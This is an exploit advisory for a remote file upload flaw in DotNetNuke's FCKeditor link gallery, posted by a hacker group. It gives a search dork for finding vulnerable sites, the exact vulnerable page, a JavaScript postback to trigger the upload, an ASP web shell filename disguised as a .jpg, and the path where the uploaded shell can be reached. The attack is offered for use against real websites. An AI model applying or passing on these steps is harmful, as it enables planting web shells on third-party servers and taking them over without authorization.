************************************************************ **DotNetNuke Remote File upload Vulnerability ************************************************************ **Prodcut:DotNetNuke **Home : www.DZ4All.cOm/Cc **Vunlerability :Remote File upload **Risk:High **Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/ ************************************************************ ** ** Original discovery and credit goes to: Alireza Afzali of ISCN Team ** Found date: 5/17/2009 ** http://securityreason.com/exploitalert/6234 ** ** Authors :Ra3cH & Ma3sTr0-Dz ** From:Algeria ** Contact : e51@hotmail.fr ** ********************************************************* ** Greetz to : ALLAH ** All Members ofhttp://www.DZ4All.cOm/Cc ** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz ************************************************************ **Exploit: **http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx ** **AnD Add :javascript:__doPostBack('ctlURL$cmdUpload','') ** ** **AnD UpLOaD YoUr ShEll AsP LiKeDz4aLL.asp;me.jpg ************************************************************ ** **you find your Shell Hier ** **http://[PATH]/portals/0/dz4all.asp;me.jpg *************************************************************
体验盒子
